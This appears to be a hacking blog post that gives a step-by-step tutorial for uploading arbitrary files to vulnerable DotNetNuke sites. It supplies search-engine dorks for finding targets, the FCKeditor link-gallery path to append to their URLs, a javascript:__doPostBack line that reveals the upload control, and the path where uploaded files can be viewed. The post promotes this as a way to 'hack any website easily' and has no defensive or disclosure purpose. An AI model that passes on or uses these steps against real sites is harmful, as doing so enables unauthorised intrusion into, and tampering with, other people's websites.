Hello Friend,today i am going to explain a trick which are very simple in use.By this attacks you hack any website easily compare to any other attacks like SQL Injection and Cross Site Scripting.Like old technique which made by Microsoft same .Net also contain many vulnerability,So here we use this vulnerability for upload our image and file to any DotNetNuke vulnerable site.
So Lets go.
STEP 1: First open your Google Search Page and type below write Dork for found the vulnerable site..
inurl:tabid/1500/default.aspx
or
inurl:/portals/0 site:.com
Note::In place of .com you also use another domain in second Dork.
STEP 2: Open the site and here you see URL address of site given as for example...
http://abcd.org/tabid/1500/Default.aspx
Change it into
http://abcdorg/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Means we add the below line in URL...
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For example see below pic...
STEP 3: When you done STEP 2 then a new page come like below pic...
STEP 4: On this page choose 3rd option where write "A File On Your Site" see below pic...
STEP 5: When STEP 4 complete then write in the URL,below write JavaScript code...
javascript:__doPostBack(‘ctlURL$cmdUpload’,’’)
For example see below pic...
STEP 6: When you done STEP 5 then a "BROWSE" option come like below pic...
Here click on the "Browse" option then a window open like below pic which open your system file for Upload.Here choose your TEXT or JPEG file for Upload.
STEP 7: When you select file then a "Upload Select File" option come like below pic circle,click it.
STEP 7: Your file Upload Successfully.For see your upload file,write on the URL address..
www.sitename.domain-name/portals/0/your-file-name.file-extension
For example see below pic...
When you do it then your Upload file you see.
IF YOU LIKE THIS POST SO GIVEN YOUR COMMENT AND IF YOU LIKE MY WORK SO PLZ FOLLOW MY BLOG.THANKS!